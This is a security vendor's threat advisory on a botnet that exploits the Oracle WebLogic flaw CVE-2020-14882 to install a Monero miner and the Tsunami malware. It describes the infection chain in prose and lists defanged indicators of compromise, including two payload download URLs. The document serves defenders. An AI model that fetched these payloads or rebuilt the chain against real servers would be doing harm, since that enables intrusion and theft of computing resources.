Platform
Managed Security Services
Managed Penetration Testing
Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Resources
September 22, 2023
Severity High Analysis Summary Ducktail Malware is a malicious program designed by hackers to infiltrate computers and networks globally. Ducktail malware is typically delivered through a […]September 22, 2023
Severity Medium Analysis Summary First discovered in 2016, Revenge RAT is a remote access trojan (RAT) designed to give an attacker complete control over an infected […]September 22, 2023
Severity High Analysis Summary The Konni APT (Advanced Persistent Threat) group is a cyber espionage group that has been active since at least 2014. It is […]Threat Insights
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Connect with Us
Platform
Managed Security Services
Managed Penetration Testing
Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Resources
September 22, 2023
Severity High Analysis Summary Ducktail Malware is a malicious program designed by hackers to infiltrate computers and networks globally. Ducktail malware is typically delivered through a […]September 22, 2023
Severity Medium Analysis Summary First discovered in 2016, Revenge RAT is a remote access trojan (RAT) designed to give an attacker complete control over an infected […]September 22, 2023
Severity High Analysis Summary The Konni APT (Advanced Persistent Threat) group is a cyber espionage group that has been active since at least 2014. It is […]Threat Insights
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Connect with Us
Rewterz Threat Alert – Malicious NPM Packages Install njRAT
December 2, 2020
Rewterz Threat Advisory – Mozilla Thunderbird SMTP server response codes buffer overflow
December 3, 2020
Severity
Medium
Analysis Summary
A botnet is detected that propagates using weblogic exploit. The botnet carries two payloads: 1) a Monero XMR Miner binaries; and 2) Tsunami binaries. This botnet is primarily targeting cloud servers. In September, an earlier version of the botnet was exploiting misconfigured docker API. Interestingly, the current botnet version contains unused code for exploiting Redis and for bruteforcing SSH. The botnet achieves persistence in multiple ways; kills running processes, potentially competing mining tools and eliminates EDR. It uses base64 encoded intermediate stage shell-scripts and base64 encoded commands to download and execute python scripts. Tsunami is added as a second payload, in addition to Monero XMR miner.
It makes use of the Oracle WebLogic RCE exploit CVE-2020-14882. The campaign uses multiple shell-scripts and python-scripts with different dropping locations and connects to binary hosting webservers using hardcoded IP addresses and domains.
The stage 1 executes two payloads, a shell script, xms, and a python script. The shellscript xms is piped to bash from curl, in case that fails, it is fetched with wget, executed and removed, to prevent analysis. The python script is fetched and executed using base64 encoded commands to avoid detection and analysis. The xms shell script attempts to infect hosts that the server has been previously connected to. It also lists running processes to grab information about active SSH connections. The XMR Miner is also targeting Windows servers which is evident by the presence of .exe binaries in the same ftp server.
Impact
- Unauthorized Remote Code Execution
- Unauthorized Access
- Process Termination
- Detection Evasion
- Unauthorized Resource Consumption
Indicators of Compromise
Domain Name
- icanhazip[.]com
- bash[.]givemexyz[.]in
- pool[.]supportxmr[.]com
- xmr[.]givemexyz[.]in
MD5
- 01581ccc96ce7ccc15205bb859d9e6bd
- cd7ca50a01fc9c6e8fdc8c3d5e6100f0
- 8bfc072d37f41190515f8dc00a59fb2e
- 5954b9c0ee8490f6f1215bace6f6c6e4
- ee48aa6068988649e41febfa0e3b2169
- c4d44eed4916675dd408ff0b3562fb1f
- 5f15d232552301b9e53d597666f610ad
- 528cfc90fd59af990c2ebc18c0df9b47
- 790c54d34b09f078a24cf27d6c91740e
- 9a9a2ffdfa4d2586eef0d1d987b57e9e
- 8bcf9e1f24093bbf32fbbc3630a0153c
- eefc0ce93d254982fbbcd26460f3d10d
- b1fc3486f3f4d3f23fcbf8b8b0522bf8
- f0551696774f66ad3485445d9e3f7214
SHA-256
- 72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5
- fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3
- 35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb
- 6f7393474c6f3c452513231d1e3fa07ed9dcc8d53a1bb2d680c78e9aa03f8f9d
- 9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872
- 855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2
- 22e3611cb2b156c3dc2d192b65707aac7787955d7dc120dfbc09aef8e12251b5
- b07bf6e14050c1c56c9b80155417370b4704eb0655cfc18bb4259956162c3814
- 508ec039ca9885f1afc6f15bb70adfa9ed32f9c2d0bff511052edb39898951c7
- 8dbd281c98c8e176621566e3a77eb8a3b7ae4f254773d56f7033f903dd09a043
- 030f41373567846ee18716605dea3ef94d1861b9c32b664d25026d41c3557c00
- 9aa8a11a52b21035ef7badb3f709fa9aa7e757788ad6100b4086f1c6a18c8ab2
- 1d804c5dfa6da0db4a4465232ad9117003df2ea8f0fc68d9e48700d4373a4568
- 1225cc15a71886e5b11fca3dc3b4c4bcde39f4c7c9fbce6bad5e4d3ceee21b3a
SHA1
- 2940e96f15345149143c53143a87fd9dce45d0ac
- e632f6b93f9e3d3f90ac2068af0b9f1ccee3cd89
- 2d9600a0697de84522b4e65d9be02b9ed9352b4d
- 2132c65f23f8e5a3c533bfa4ab73562c476795e0
- 73c2099c703c9e644172ff58fd49622c06bf2784
- 57279a4f3ccd3f6abbc2c306682438234241598b
- 2847609cb04158c6f8e57ec65d63fabc68577a07
- 9173ca39c025c322864b05a1cd44c022925d7ffc
- 87fe997bb49499d1f743da9840618e30aeb5d24e
- 01ebd97e50edc39ade8cefacaffe5bef5c49bf15
- adaaf46b2bd14a05e58a460e0e2115e696c182fa
- bae9b44362654ef283cbd197bca4d2b3aca8868d
- 7bfa2404bc9733205d2374b92fb3ebf57410228f
- d5f53aa9b9e9899fa511b199230159dfbf215dad
Source IP
- 205[.]185[.]116[.]78
- 66[.]70[.]218[.]40
- 209[.]141[.]35[.]17
- 104[.]244[.]75[.]25
- 198[.]98[.]57[.]217
- 194[.]156[.]99[.]30
URL
- http[:]//205[.]185[.]116[.]78/b[.]py
- http[:]//bash[.]givemexyz[.]in/dd[.]py
Remediation
- Block the threat indicators at their respective controls.
- Keep all systems and software updated to latest patched versions.
- Maintain a strong password policy and enable multifactor authentication where possible.